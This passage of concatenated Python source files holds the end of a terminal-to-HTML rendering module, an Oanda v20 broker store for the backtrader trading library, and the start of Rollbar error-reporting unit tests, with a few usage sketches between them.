= True if char in "&<>": # Have to convert ampersands and lt/gt to HTML entities char = html_entities[char] if rend == prev_rendition: changed = False else: prev_rendition = rend if changed and rend != None: classes = imap(rendition_classes.get, rend) for _class in classes: if _class and _class not in current_classes: if spancount: outline += "</span>" spancount -= 1 if 'reset' in _class: if _class == 'reset': current_classes = set() else: reset_class = _class.split('reset')[0] if reset_class == 'foreground': [current_classes.remove(a) for a in current_classes if a in foregrounds] elif reset_class == 'background': [current_classes.remove(a) for a in current_classes if a in backgrounds] elif reset_class in current_classes: current_classes.remove(reset_class) else: if _class in foregrounds: [current_classes.remove(a) for a in current_classes if a in foregrounds] elif _class in backgrounds: [current_classes.remove(a) for a in current_classes if a in backgrounds] current_classes.add(_class) if current_classes: outline += '<span class="%s%s">' % ( self.class_prefix, (" %s" % self.class_prefix).join(current_classes)) spancount += 1 outline += char if outline: # Make sure all renditions terminate at the end of the line for whatever in xrange(spancount): outline += "</span>" results.append(outline) else: results.append(None) for whatever in xrange(spancount): # Bit of cleanup to be safe results[-1] += "</span>" return results def dump_html(self, renditions=True): """ Dumps the terminal screen as a list of HTML-formatted lines. If *renditions* is True (default) then terminal renditions will be converted into HTML <span> elements so they will be displayed properly in a browser. Otherwise only the cursor <span> will be added to mark its location. .. note:: This places <span class="cursor">(current character)</span> around the cursor location. """ if renditions: # i.e. 
            screen = self._spanify_screen()
            scrollback = []
            if self.scrollback_buf:
                scrollback = self._spanify_scrollback()
        else:
            cursorX = self.cursorX
            cursorY = self.cursorY
            screen = []
            for y, row in enumerate(self.screen):
                if y == cursorY:
                    cursor_row = ""
                    for x, char in enumerate(row):
                        if x == cursorX:
                            cursor_row += (
                                '<span class="%scursor">%s</span>' % (
                                    self.class_prefix, char))
                        else:
                            cursor_row += char
                    screen.append(cursor_row)
                else:
                    screen.append("".join(row))
            scrollback = [a.tounicode() for a in self.scrollback_buf]
        # Empty the scrollback buffer:
        self.init_scrollback()
        self.modified = False
        return (scrollback, screen)

    # NOTE: This is a work-in-progress.  Don't use it.
    def dump_html_async(self, identifier=None, renditions=True, callback=None):
        """
        Dumps the terminal screen as a list of HTML-formatted lines.  If
        *renditions* is True (default) then terminal renditions will be
        converted into HTML <span> elements so they will be displayed properly
        in a browser.  Otherwise only the cursor <span> will be added to mark
        its location.

        .. note::

            This places <span class="cursor">(current character)</span> around
            the cursor location.
        """
        if self.async:
            state_obj = {
                'html_cache': HTML_CACHE,
                'screen': self.screen,
                'renditions': self.renditions,
                'renditions_store': self.renditions_store,
                'cursorX': self.cursorX,
                'cursorY': self.cursorY,
                'show_cursor': self.expanded_modes['25'],
                'class_prefix': self.class_prefix
            }
            self.async.call_singleton(
                spanify_screen, identifier, state_obj, callback=callback)
        else:
            scrollback, screen = self.dump_html(renditions=renditions)
            callback(scrollback, screen)

    def dump_plain(self):
        """
        Dumps the screen and the scrollback buffer as-is then empties the
        scrollback buffer.
        """
        screen = self.screen
        scrollback = self.scrollback_buf
        # Empty the scrollback buffer:
        self.init_scrollback()
        self.modified = False
        return (scrollback, screen)

    def dump_components(self):
        """
        Dumps the screen and renditions as-is, the scrollback buffer as HTML,
        and the current cursor coordinates.  Also, empties the scrollback
        buffer.

        .. note::

            This was used in some performance-related experiments but might be
            useful for other patterns in the future so I've left it here.
        """
        screen = [a.tounicode() for a in self.screen]
        scrollback = []
        if self.scrollback_buf:
            # Process the scrollback buffer into HTML
            # (_spanify_scrollback() takes no arguments; it reads
            # self.scrollback_buf and self.scrollback_renditions directly)
            scrollback = self._spanify_scrollback()
        # Empty the scrollback buffer:
        self.init_scrollback()
        self.modified = False
        return (scrollback, screen, self.renditions, self.cursorY,
                self.cursorX)

    def dump(self):
        """
        Returns self.screen as a list of strings with no formatting.  No
        scrollback buffer.  No renditions.  It is meant to be used to get a
        quick glance of what is being displayed (when debugging).

        .. note:: This method does not empty the scrollback buffer.
        """
        out = []
        for line in self.screen:
            line_out = ""
            for char in line:
                if len(char) > 1: # This is an image (or similar)
                    line_out += u'⬚' # Use a dotted square as a placeholder
                else:
                    line_out += char
            out.append(line_out)
        self.modified = False
        return out

# This is here to make it easier for someone to produce an HTML app that uses
# terminal.py
def css_renditions(selector=None):
    """
    Returns a (long) string containing all the CSS styles in order to support
    terminal text renditions (different colors, bold, etc) in an HTML terminal
    using the dump_html() function.
    If *selector* is provided, all styles will be prefixed with said selector
    like so::

        ${selector} span.f0 { color: #5C5C5C; }

    Example::

        >>> css_renditions("#gateone").splitlines()[7]
        '#gateone span.f0 { color: #5C5C5C; } /* Black */'
    """
    from string import Template
    # Try looking for the fallback CSS template in two locations:
    #   * The same directory that holds terminal.py
    #   * A 'templates' directory in the same location as terminal.py
    template_name = 'terminal_renditions_fallback.css'
    template_path = os.path.join(os.path.split(__file__)[0], template_name)
    if not os.path.exists(template_path):
        # Try looking in a 'templates' directory
        template_path = os.path.join(
            os.path.split(__file__)[0], 'templates', template_name)
        if not os.path.exists(template_path):
            raise IOError("File not found: %s" % template_name)
    with open(template_path) as f:
        css = f.read()
    renditions_template = Template(css)
    return renditions_template.substitute(selector=selector)
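
Taken together, dump_html() and css_renditions() are enough to render a static page from a terminal dump. A minimal sketch, assuming this module is importable as `terminal` and that its Terminal class takes rows/cols and exposes a write() method for feeding it output (the constructor signature and the sample escape sequence are illustrative, not taken from this file):

# Illustration only: combine dump_html() with css_renditions().
from terminal import Terminal, css_renditions  # assumed module/class names

term = Terminal(rows=24, cols=80)              # assumed constructor signature
term.write(u'\x1b[1;31mbold red\x1b[0m plain\r\n')
scrollback, screen = term.dump_html()          # lists of HTML-formatted lines
# None entries stand for blank lines (see the NOTE in _spanify_screen()):
lines = [l if l is not None else u'' for l in scrollback + screen]
page = (
    u'<html><head><style>%s</style></head>'
    u'<body><div id="gateone"><pre>%s</pre></div></body></html>'
) % (css_renditions('#gateone'), u'\n'.join(lines))
with open('dump.html', 'wb') as f:
    f.write(page.encode('utf-8'))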
oandav20store.py
#!/usr/bin/env python from __future__ import (absolute_import, division, print_function, unicode_literals) import collections import json import threading import copy import time as _time from datetime import datetime, timedelta import v20 import backtrader as bt from backtrader.metabase import MetaParams from backtrader.utils.py3 import queue, with_metaclass class SerializableEvent(object): '''A threading.Event that can be serialized.''' def __init__(self): self.evt = threading.Event() def set(self): return self.evt.set() def clear(self): return self.evt.clear() def isSet(self): return self.evt.isSet() def wait(self, timeout=0): return self.evt.wait(timeout) def __getstate__(self): d = copy.copy(self.__dict__) if self.evt.isSet(): d['evt'] = True else: d['evt'] = False return d def __setstate__(self, d): self.evt = threading.Event() if d['evt']: self.evt.set() class MetaSingleton(MetaParams): '''Metaclass to make a metaclassed class a singleton''' def __init__(cls, name, bases, dct): super(MetaSingleton, cls).__init__(name, bases, dct) cls._singleton = None def __call__(cls, *args, **kwargs): if cls._singleton is None: cls._singleton = ( super(MetaSingleton, cls).__call__(*args, **kwargs)) return cls._singleton class OandaV20Store(with_metaclass(MetaSingleton, object)): '''Singleton class wrapping to control the connections to Oanda v20. Params: - ``token`` (default:``None``): API access token - ``account`` (default: ``None``): account id - ``practice`` (default: ``False``): use the test environment - ``account_poll_freq`` (default: ``10.0``): refresh frequency for account value/cash refresh - ``stream_timeout`` (default: ``10``): timeout for stream requests - ``poll_timeout`` (default: ``2``): timeout for poll requests ''' params = ( ('token', ''), ('account', ''), ('practice', False), ('account_poll_freq', 10.0), # account balance refresh timeout ('stream_timeout', 10), ('poll_timeout', 2), ) BrokerCls = None # broker class will auto register DataCls = None # data class will auto register # Oanda supported granularities '''S5, S10, S15, S30, M1, M2, M3, M4, M5, M10, M15, M30, H1, H2, H3, H4, H6, H8, H12, D, W, M''' _GRANULARITIES = { (bt.TimeFrame.Seconds, 5): 'S5', (bt.TimeFrame.Seconds, 10): 'S10', (bt.TimeFrame.Seconds, 15): 'S15', (bt.TimeFrame.Seconds, 30): 'S30', (bt.TimeFrame.Minutes, 1): 'M1', (bt.TimeFrame.Minutes, 2): 'M2', (bt.TimeFrame.Minutes, 3): 'M3', (bt.TimeFrame.Minutes, 4): 'M4', (bt.TimeFrame.Minutes, 5): 'M5', (bt.TimeFrame.Minutes, 10): 'M10', (bt.TimeFrame.Minutes, 15): 'M15', (bt.TimeFrame.Minutes, 30): 'M30', (bt.TimeFrame.Minutes, 60): 'H1', (bt.TimeFrame.Minutes, 120): 'H2', (bt.TimeFrame.Minutes, 180): 'H3', (bt.TimeFrame.Minutes, 240): 'H4', (bt.TimeFrame.Minutes, 360): 'H6', (bt.TimeFrame.Minutes, 480): 'H8', (bt.TimeFrame.Minutes, 720): 'H12', (bt.TimeFrame.Days, 1): 'D', (bt.TimeFrame.Weeks, 1): 'W', (bt.TimeFrame.Months, 1): 'M', } # Order type matching with oanda _ORDEREXECS = { bt.Order.Market: 'MARKET', bt.Order.Limit: 'LIMIT', bt.Order.Stop: 'STOP', bt.Order.StopLimit: 'STOP', } # Oanda api endpoints _OAPI_URL = ["api-fxtrade.oanda.com", "api-fxpractice.oanda.com"] _OAPI_STREAM_URL = ["stream-fxtrade.oanda.com", "stream-fxpractice.oanda.com"] @classmethod def getdata(cls, *args, **kwargs): '''Returns ``DataCls`` with args, kwargs''' return cls.DataCls(*args, **kwargs) @classmethod def getbroker(cls, *args, **kwargs): '''Returns broker with *args, **kwargs from registered ``BrokerCls``''' return cls.BrokerCls(*args, **kwargs) def __init__(self): 
'''Initialization''' super(OandaV20Store, self).__init__() self.notifs = collections.deque() # store notifications for cerebro self._cash = 0.0 # margin available, currently available cash self._value = 0.0 # account balance self._currency = None # account currency self.broker = None # broker instance self.datas = list() # datas that have registered over start self._env = None # reference to cerebro for general notifications self._evt_acct = SerializableEvent() self._orders = collections.OrderedDict() # map order.ref to order id # init oanda v20 api context self.oapi = v20.Context( self._OAPI_URL[int(self.p.practice)], poll_timeout=self.p.poll_timeout, port=443, ssl=True, token=self.p.token, datetime_format="UNIX", ) # init oanda v20 api stream context self.oapi_stream = v20.Context( self._OAPI_STREAM_URL[int(self.p.practice)], stream_timeout=self.p.stream_timeout, port=443, ssl=True, token=self.p.token, datetime_format="UNIX", ) def start(self, data=None, broker=None): # Datas require some processing to kickstart data reception if data is None and broker is None: self.cash = None return if data is not None: self._env = data._env # For datas simulate a queue with None to kickstart co self.datas.append(data) if self.broker is not None: self.broker.data_started(data) elif broker is not None: self.broker = broker self.streaming_events() self.broker_threads() def stop(self): # signal end of thread if self.broker is not None: self.q_ordercreate.put(None) self.q_orderclose.put(None) self.q_account.put(None) def put_notification(self, msg, *args, **kwargs): '''Adds a notification''' self.notifs.append((msg, args, kwargs)) def get_notifications(self): '''Return the pending "store" notifications''' self.notifs.append(None) # put a mark / threads could still append return [x for x in iter(self.notifs.popleft, None)] def get_positions(self): '''Returns the currently open positions''' try: response = self.oapi.position.list_open(self.p.account) pos = response.get('positions', 200) # convert positions to dict for idx, val in enumerate(pos): pos[idx] = val.dict() except Exception as e: self.put_notification(e) return None return pos def get_granularity(self, timeframe, compression): '''Returns the granularity usable for oanda''' return self._GRANULARITIES.get((timeframe, compression), None) def get_instrument(self, dataname): '''Returns details about the requested instrument''' try: response = self.oapi.account.instruments(self.p.account, instruments=dataname) inst = response.get('instruments', 200) # convert instruments to dict for idx, val in enumerate(inst): inst[idx] = val.dict() except Exception as e: self.put_notification(e) return None return inst[0] or None def get_instruments(self, dataname): '''Returns details about available instruments''' try: response = self.oapi.account.instruments(self.p.account, instruments=dataname) inst = response.get('instruments', 200) # convert instruments to dict for idx, val in enumerate(inst): inst[idx] = val.dict() except Exception as e: self.put_notification(e) return None return inst or None def get_pricing(self, dataname): '''Returns details about current price''' try: response = self.oapi.pricing.get(self.p.account, instruments=dataname) prices = response.get('prices', 200) # convert prices to dict for idx, val in enumerate(prices): prices[idx] = val.dict() except Exception as e: self.put_notification(e) return None return prices[0] or None def get_pricings(self, dataname): '''Returns details about current prices''' try: response =
self.oapi.pricing.get(self.p.account, instruments=dataname) prices = response.get('prices', 200) # convert prices to dict for idx, val in enumerate(prices): prices[idx] = val.dict() except Exception as e: self.put_notification(e) return None return prices or None def get_cash(self): '''Returns the available cash''' return self._cash def get_value(self): '''Returns the account balance''' return self._value def get_currency(self): '''Returns the currency of the account''' return self._currency def broker_threads(self): '''Creates threads for broker functionality''' self.q_account = queue.Queue() self.q_account.put(True) # force an immediate update t = threading.Thread(target=self._t_account) t.daemon = True t.start() self.q_ordercreate = queue.Queue() t = threading.Thread(target=self._t_order_create) t.daemon = True t.start() self.q_orderclose = queue.Queue() t = threading.Thread(target=self._t_order_cancel) t.daemon = True t.start() # Wait once for the values to be set self._evt_acct.wait(self.p.account_poll_freq) def streaming_events(self, tmout=None): '''Creates threads for event streaming''' q = queue.Queue() kwargs = {'q': q, 'tmout': tmout} t = threading.Thread(target=self._t_streaming_events, kwargs=kwargs) t.daemon = True t.start() return q def streaming_prices(self, dataname, tmout=None): '''Creates threads for price streaming''' q = queue.Queue() kwargs = {'q': q, 'dataname': dataname, 'tmout': tmout} t = threading.Thread(target=self._t_streaming_prices, kwargs=kwargs) t.daemon = True t.start() return q def order_create(self, order, stopside=None, takeside=None, **kwargs): '''Creates an order''' okwargs = dict() okwargs['instrument'] = order.data._dataname okwargs['units'] = abs(int(order.created.size)) if order.isbuy() else -abs(int(order.created.size)) # negative for selling okwargs['type'] = self._ORDEREXECS[order.exectype] if order.exectype != bt.Order.Market: okwargs['price'] = format(order.created.price, '.%df' % order.data.contractdetails['displayPrecision']) if order.valid is None: okwargs['timeInForce'] = 'GTC' # good to cancel else: okwargs['timeInForce'] = 'GTD' # good to date gtdtime = order.data.num2date(order.valid) okwargs['gtdTime'] = gtdtime.strftime("%Y-%m-%dT%H:%M:%S.000000000Z") if order.exectype == bt.Order.StopLimit: okwargs['priceBound'] = order.created.pricelimit if order.exectype == bt.Order.StopTrail: okwargs['distance'] = order.trailamount if stopside is not None and stopside.price is not None: okwargs['stopLossOnFill'] = v20.transaction.StopLossDetails( price = format(stopside.price, '.%df' % order.data.contractdetails['displayPrecision']), clientExtensions = v20.transaction.ClientExtensions( id = str(stopside.ref) ).dict() ).dict() if takeside is not None and takeside.price is not None: okwargs['takeProfitOnFill'] = v20.transaction.TakeProfitDetails( price = format(takeside.price, '.%df' % order.data.contractdetails['displayPrecision']), clientExtensions = v20.transaction.ClientExtensions( id = str(takeside.ref) ).dict() ).dict() # store backtrader order ref in client extensions okwargs['clientExtensions'] = v20.transaction.ClientExtensions( id = str(order.ref) ).dict() okwargs.update(**kwargs) # anything from the user self.q_ordercreate.put((order.ref, okwargs,)) # notify orders of being submitted self.broker._submit(order.ref) if stopside is not None and stopside.price is not None: self.broker._submit(stopside.ref) if takeside is not None and takeside.price is not None: self.broker._submit(takeside.ref) return order def order_cancel(self, order): 
'''Cancels an order''' self.q_orderclose.put(order.ref) return order def candles(self, dataname, dtbegin, dtend, timeframe, compression, candleFormat, includeFirst=True, onlyComplete=True): '''Returns historical rates''' q = queue.Queue() kwargs = {'dataname': dataname, 'dtbegin': dtbegin, 'dtend': dtend, 'timeframe': timeframe, 'compression': compression, 'candleFormat': candleFormat, 'includeFirst': includeFirst, 'onlyComplete': onlyComplete, 'q': q} t = threading.Thread(target=self._t_candles, kwargs=kwargs) t.daemon = True t.start() return q def _t_streaming_events(self, q, tmout=None): '''Callback method for streaming events''' if tmout is not None: _time.sleep(tmout) try: response = self.oapi_stream.transaction.stream( self.p.account ) for msg_type, msg in response.parts(): if msg_type == "transaction.Transaction": self._transaction(msg.dict()) except Exception as e: self.put_notification(e) def _t_streaming_prices(self, dataname, q, tmout): '''Callback method for streaming prices''' if tmout is not None: _time.sleep(tmout) try: response = self.oapi_stream.pricing.stream( self.p.account, instruments=dataname, ) for msg_type, msg in response.parts(): # FIXME not sure, why the type is either Price or ClientPrice # https://github.com/ftomassetti/backtrader-oandav20/issues/26 # there was already a suggestion to change this, but both # msg_types return the price. Check for both msg_types (Price, ClientPrice) # to fetch all streamed prices. if msg_type in ["pricing.Price", "pricing.ClientPrice"]: # put price into queue as dict q.put(msg.dict()) except Exception as e: self.put_notification(e) def _t_account(self): '''Callback method for account request''' while True: try: msg = self.q_account.get(timeout=self.p.account_poll_freq) if msg is None: break # end of thread except queue.Empty: # tmout -> time to refresh pass try: response = self.oapi.account.summary(self.p.account) accinfo = response.get('account', 200) except Exception as e: self.put_notification(e) print(e, response.get('errorMessage')) continue try: self._cash = accinfo.marginAvailable self._value = accinfo.balance self._currency = accinfo.currency except KeyError: pass # notify of success, initialization waits for it self._evt_acct.set() def _t_candles(self, dataname, dtbegin, dtend, timeframe, compression, candleFormat, includeFirst, onlyComplete, q): '''Callback method for candles request''' granularity = self.get_granularity(timeframe, compression) if granularity is None: q.put(None) return dtkwargs = {} if dtbegin is not None: dtkwargs['fromTime'] = dtbegin.strftime("%Y-%m-%dT%H:%M:%S.000000000Z") dtkwargs['includeFirst'] = includeFirst count = 0 while True: count += 1 if count > 1: dtkwargs['includeFirst'] = False try: response = self.oapi.instrument.candles(dataname, granularity=granularity, price=candleFormat, **dtkwargs) candles = response.get('candles', 200) except Exception as e: self.put_notification(e) print(e, response.get('errorMessage')) return dtobj = None for candle in candles: # get current candle time dtobj = datetime.utcfromtimestamp(float(candle.time)) # if end time is provided, check if time is reached for every candle if dtend is not None and dtobj > dtend: break # add candle if not onlyComplete or candle.complete: q.put(candle.dict()) if dtobj is not None: dtkwargs['fromTime'] = dtobj.strftime("%Y-%m-%dT%H:%M:%S.000000000Z") elif dtobj is None: break if dtend is not None and dtobj > dtend: break if len(candles) == 0: break q.put({}) # end of transmission # transactions which will be emitted on
creating/accepting an order _X_CREATE_TRANS = ['MARKET_ORDER', 'LIMIT_ORDER', 'STOP_ORDER', 'TAKE_PROFIT_ORDER', 'STOP_LOSS_ORDER',] # transactions which filled orders _X_FILL_TRANS = ['ORDER_FILL',] # transactions which cancelled orders _X_CANCEL_TRANS = ['ORDER_CANCEL',] # transactions which were rejected _X_REJECT_TRANS = ['MARKET_ORDER_REJECT', 'LIMIT_ORDER_REJECT', 'STOP_ORDER_REJECT', 'TAKE_PROFIT_ORDER_REJECT', 'STOP_LOSS_ORDER_REJECT',] # transactions which can be ignored _X_IGNORE_TRANS = ['DAILY_FINANCING', 'CLIENT_CONFIGURE'] def _transaction(self, trans): oid = None ttype = trans['type'] if ttype in self._X_CREATE_TRANS: # get order id (matches transaction id) oid = trans['id'] oref = None # identify backtrader order by checking client extensions (this is used when creating an order) if 'clientExtensions' in trans: # assume backtrader created the order for this transaction oref = int(trans['clientExtensions']['id']) if oref is not None: self._orders[oid] = oref elif ttype in self._X_FILL_TRANS: # order was filled, notify backtrader of it oid = trans['orderID'] elif ttype in self._X_CANCEL_TRANS: # order was cancelled, notify backtrader of it oid = trans['orderID'] elif ttype in self._X_REJECT_TRANS: # transaction was rejected, notify backtrader of it oid = trans['requestID'] elif ttype in self._X_IGNORE_TRANS: # transaction can be ignored msg = 'Received transaction {} with id {}. Ignoring transaction.' msg = msg.format(ttype, trans['id']) self.put_notification(msg, trans) else: msg = 'Received transaction {} with id {}. Unknown situation.' msg = msg.format(ttype, trans['id']) self.put_notification(msg, trans) return if oid in self._orders: # when an order id exists process transaction self._process_transaction(oid, trans) else: # external order created this transaction if self.broker.p.use_positions and ttype in self._X_FILL_TRANS: size = float(trans['units']) price = float(trans['price']) for data in self.datas: if data._name == trans['instrument']: self.broker._fill_external(data, size, price) break elif ttype not in self._X_IGNORE_TRANS: # notify about unknown transaction if self.broker.p.use_positions: msg = 'Received external transaction {} with id {}. Skipping transaction.' else: msg = 'Received external transaction {} with id {}. Positions and trades may not match anymore.'
msg = msg.format(ttype, trans['id']) self.put_notification(msg, trans) def _process_transaction(self, oid, trans): try: # get a reference to a backtrader order based on the order id / trade id oref = self._orders[oid] except KeyError: return ttype = trans['type'] if ttype in self._X_CREATE_TRANS: self.broker._accept(oref) elif ttype in self._X_FILL_TRANS: size = float(trans['units']) price = float(trans['price']) self.broker._fill(oref, size, price, reason=trans['reason']) # store trade ids which were touched by the order if 'tradeOpened' in trans: self._orders[trans['tradeOpened']['tradeID']] = oref if 'tradeReduced' in trans: self._orders[trans['tradeReduced']['tradeID']] = oref elif ttype in self._X_CANCEL_TRANS: reason = trans['reason'] if reason == 'TIME_IN_FORCE_EXPIRED': self.broker._expire(oref) else: self.broker._cancel(oref) elif ttype in self._X_REJECT_TRANS: self.broker._reject(oref) def _t_order_create(self): while True: msg = self.q_ordercreate.get() if msg is None: break oref, okwargs = msg try: response = self.oapi.order.create(self.p.account, order=okwargs) # get the transaction which created the order o = response.get("orderCreateTransaction", 201) except Exception as e: self.put_notification(e) self.broker._reject(oref) continue def _t_order_cancel(self): while True: oref = self.q_orderclose.get() if oref is None: break oid = self._orders.get(oref, None) if oid is None: continue # the order is no longer there try: # TODO either close pending orders or filled trades response = self.oapi.trade.close(self.p.account, oid) except Exception as e: self.put_notification(e) continue self.broker._cancel(oref)
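
For context, this is roughly how the store is meant to be wired into a backtrader run. A minimal sketch, assuming the companion data and broker classes register themselves as DataCls/BrokerCls on import (as the "will auto register" comments above describe); the module path, token, and account values are placeholders:

# Minimal usage sketch for OandaV20Store (assumptions noted above).
import backtrader as bt
from oandav20store import OandaV20Store  # assumed module path

store = OandaV20Store(token='<api-token>', account='<account-id>',
                      practice=True)
# MetaSingleton makes the store a singleton: any later OandaV20Store(...)
# call returns this same instance, regardless of the arguments passed.

cerebro = bt.Cerebro()
cerebro.setbroker(store.getbroker())  # instantiates the registered BrokerCls
data = store.getdata(dataname='EUR_USD',
                     timeframe=bt.TimeFrame.Minutes,
                     compression=5)   # maps to granularity 'M5' (see table)
cerebro.adddata(data)
cerebro.run()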
test_rollbar.py
import base64 import copy import json import socket import threading import uuid import sys try: from StringIO import StringIO except ImportError: from io import StringIO try: from unittest import mock except ImportError: import mock import unittest import rollbar from rollbar.lib import python_major_version, string_types from rollbar.test import BaseTest try: eval(""" def _anonymous_tuple_func(x, (a, b), y): ret = x + a + b + y breakme() return ret """) except SyntaxError: _anonymous_tuple_func = None _test_access_token = 'aaaabbbbccccddddeeeeffff00001111' _default_settings = copy.deepcopy(rollbar.SETTINGS) class RollbarTest(BaseTest): def setUp(self): rollbar._initialized = False rollbar.SETTINGS = copy.deepcopy(_default_settings) rollbar.init(_test_access_token, locals={'enabled': True}, dummy_key='asdf', handler='blocking', timeout=12345) def test_merged_settings(self): expected = {'enabled': True, 'sizes': rollbar.DEFAULT_LOCALS_SIZES, 'safe_repr': True, 'scrub_varargs': True, 'safelisted_types': [], 'whitelisted_types': []} self.assertDictEqual(rollbar.SETTINGS['locals'], expected) self.assertEqual(rollbar.SETTINGS['timeout'], 12345) self.assertEqual(rollbar.SETTINGS['dummy_key'], 'asdf') def test_default_configuration(self): self.assertEqual(rollbar.SETTINGS['access_token'], _test_access_token) self.assertEqual(rollbar.SETTINGS['environment'], 'production') @mock.patch('rollbar.send_payload') def test_disabled(self, send_payload): rollbar.SETTINGS['enabled'] = False rollbar.report_message('foo') try: raise Exception('foo') except: rollbar.report_exc_info() self.assertEqual(send_payload.called, False) def test_server_data(self): server_data = rollbar._build_server_data() self.assertIn('host', server_data) self.assertIn('argv', server_data) self.assertNotIn('branch', server_data) self.assertNotIn('root', server_data) rollbar.SETTINGS['branch'] = 'master' rollbar.SETTINGS['root'] = '/home/test/' server_data = rollbar._build_server_data() self.assertIn('host', server_data) self.assertIn('argv', server_data) self.assertEqual(server_data['branch'], 'master') self.assertEqual(server_data['root'], '/home/test/') def test_wsgi_request_data(self): request = { 'CONTENT_LENGTH': str(len('body body body')), 'CONTENT_TYPE': '', 'DOCUMENT_URI': '/api/test', 'GATEWAY_INTERFACE': 'CGI/1.1', 'HTTP_CONNECTION': 'close', 'HTTP_HOST': 'example.com', 'HTTP_USER_AGENT': 'Agent', 'PATH_INFO': '/api/test', 'QUERY_STRING': 'format=json&param1=value1&param2=value2', 'REMOTE_ADDR': '127.0.0.1', 'REQUEST_METHOD': 'GET', 'SCRIPT_NAME': '', 'SERVER_ADDR': '127.0.0.1', 'SERVER_NAME': 'example.com', 'SERVER_PORT': '80', 'SERVER_PROTOCOL': 'HTTP/1.1', 'wsgi.input': StringIO('body body body'), 'wsgi.multiprocess': True, 'wsgi.multithread': False, 'wsgi.run_once': False, 'wsgi.url_scheme': 'http', 'wsgi.version': (1, 0) } data = rollbar._build_wsgi_request_data(request) self.assertEqual(data['url'], 'http://example.com/api/test?format=json&param1=value1&param2=value2') self.assertEqual(data['user_ip'], '127.0.0.1') self.assertEqual(data['method'], 'GET') self.assertEqual(data['body'], 'body body body') self.assertDictEqual(data['GET'], {'format': 'json', 'param1': 'value1', 'param2': 'value2'}) self.assertDictEqual(data['headers'], {'Connection': 'close', 'Host': 'example.com', 'User-Agent': 'Agent'}) def test_starlette_request_data(self): try: from starlette.requests import Request except ImportError: self.skipTest('Requires Starlette to be installed') scope = { 'type': 'http', 'client': ('127.0.0.1', 1453), 
'headers': [ (b'accept', b'*/*'), (b'content-type', b'application/x-www-form-urlencoded'), (b'host', b'example.com'), (b'user-agent', b'Agent'), ], 'http_version': '1.1', 'method': 'GET', 'path': '/api/test', 'path_params': {'param': 'test'}, 'query_params': { 'format': 'json', 'param1': 'value1', 'param2': 'value2', }, 'query_string': b'format=json&param1=value1&param2=value2', 'scheme': 'http', 'server': ('example.com', 80), 'url': {'path': 'example.com'}, } request = Request(scope) data = rollbar._build_starlette_request_data(request) self.assertEqual(data['url'], 'http://example.com/api/test?format=json&param1=value1&param2=value2') self.assertEqual(data['user_ip'], '127.0.0.1') self.assertEqual(data['method'], 'GET') self.assertDictEqual(data['params'], {'param': 'test'}) self.assertDictEqual(data['GET'], {'format': 'json', 'param1': 'value1', 'param2': 'value2'}) self.assertDictEqual( data['headers'], { 'accept': '*/*', 'content-type': 'application/x-www-form-urlencoded', 'host': 'example.com', 'user-agent': 'Agent', }, ) def test_starlette_request_data_with_consumed_body(self): try: from starlette.requests import Request except ImportError: self.skipTest('Requires Starlette to be installed') from rollbar.lib._async import async_receive, run rollbar.SETTINGS['include_request_body'] = True body = b'body body body' scope = { 'type': 'http', 'headers': [ (b'content-type', b'text/html'), (b'content-length', str(len(body)).encode('latin-1')), ], 'method': 'GET', 'path': '/api/test', 'query_string': b'', } receive = async_receive( {'type': 'http.request', 'body': body, 'more_body': False} ) request = Request(scope, receive) # Consuming body in Starlette middleware is currently disabled run(request.body()) # await request.body() data = rollbar._build_starlette_request_data(request) self.assertEqual(data['body'], body.decode('latin-1')) def test_starlette_request_data_empty_values(self): try: from starlette.requests import Request except ImportError: self.skipTest('Requires Starlette to be installed') scope = { 'type': 'http', 'client': ('127.0.0.1', 1453), 'headers': [ (b'content-type', b'text/html'), ], 'method': 'GET', 'query_string': b'', 'path': '', } request = Request(scope) data = rollbar._build_starlette_request_data(request) self.assertFalse('GET' in data) self.assertFalse('url' in data) self.assertFalse('params' in data) self.assertTrue('headers' in data) self.assertEqual(data['user_ip'], scope['client'][0]) self.assertEqual(data['method'], scope['method']) def test_fastapi_request_data(self): try: from fastapi.requests import Request except ImportError: self.skipTest('Requires FastAPI to be installed') scope = { 'type': 'http', 'client': ('127.0.0.1', 1453), 'headers': [ (b'accept', b'*/*'), (b'content-type', b'application/x-www-form-urlencoded'), (b'host', b'example.com'), (b'user-agent', b'Agent'), ], 'http_version': '1.1', 'method': 'GET', 'path': '/api/test', 'path_params': {'param': 'test'}, 'query_params': { 'format': 'json', 'param1': 'value1', 'param2': 'value2', }, 'query_string': b'format=json&param1=value1&param2=value2', 'scheme': 'http', 'server': ('example.com', 80), 'url': {'path': 'example.com'}, } request = Request(scope) data = rollbar._build_fastapi_request_data(request) self.assertEqual(data['url'], 'http://example.com/api/test?format=json&param1=value1&param2=value2') self.assertEqual(data['user_ip'], '127.0.0.1') self.assertEqual(data['method'], 'GET') self.assertDictEqual(data['params'], {'param': 'test'}) self.assertDictEqual(data['GET'], {'format': 'json',
'param1': 'value1', 'param2': 'value2'}) self.assertDictEqual( data['headers'], { 'accept': '*/*', 'content-type': 'application/x-www-form-urlencoded', 'host': 'example.com', 'user-agent': 'Agent', }, ) def test_fastapi_request_data_with_consumed_body(self): try: from fastapi import Request except ImportError: self.skipTest('Requires FastAPI to be installed') from rollbar.lib._async import async_receive, run rollbar.SETTINGS['include_request_body'] = True body = b'body body body' scope = { 'type': 'http', 'headers': [ (b'content-type', b'text/html'), (b'content-length', str(len(body)).encode('latin-1')), ], 'method': 'GET', 'path': '/api/test', 'query_string': b'', } receive = async_receive( {'type': 'http.request', 'body': body, 'more_body': False} ) request = Request(scope, receive) # Consuming body in FastAPI middlewares is currently disabled run(request.body()) # await request.body() data = rollbar._build_fastapi_request_data(request) self.assertEqual(data['body'], body.decode('latin-1')) def test_fastapi_request_data_empty_values(self): try: from fastapi import Request except ImportError: self.skipTest('Requires FastAPI to be installed') scope = { 'type': 'http', 'client': ('127.0.0.1', 1453), 'headers': [ (b'content-type', b'text/html'), ], 'method': 'GET', 'query_string': b'', 'path': '', } request = Request(scope) data = rollbar._build_fastapi_request_data(request) self.assertFalse('GET' in data) self.assertFalse('url' in data) self.assertFalse('params' in data) self.assertTrue('headers' in data) self.assertEqual(data['user_ip'], scope['client'][0]) self.assertEqual(data['method'], scope['method']) @unittest.skipUnless(sys.version_info >= (3, 6), 'Python3.6+ required') def test_get_request_starlette_middleware(self): try: from starlette.applications import Starlette from starlette.middleware import Middleware from starlette.responses import PlainTextResponse from starlette.routing import Route from starlette.testclient import TestClient except ImportError: self.skipTest('Requires Starlette package') from rollbar.contrib.starlette import ReporterMiddleware def root(starlette_request): current_request = rollbar.get_request() self.assertEqual(current_request, starlette_request) return PlainTextResponse("bye bye") routes = [Route('/{param}', root)] 